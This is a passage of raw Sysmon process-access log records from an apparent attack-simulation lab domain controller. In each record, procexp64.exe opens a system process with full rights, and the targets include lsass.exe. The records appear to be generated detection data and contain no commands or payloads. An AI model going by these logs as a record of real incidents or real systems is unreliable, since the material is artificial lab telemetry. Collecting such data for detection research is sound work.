Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:25.033{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 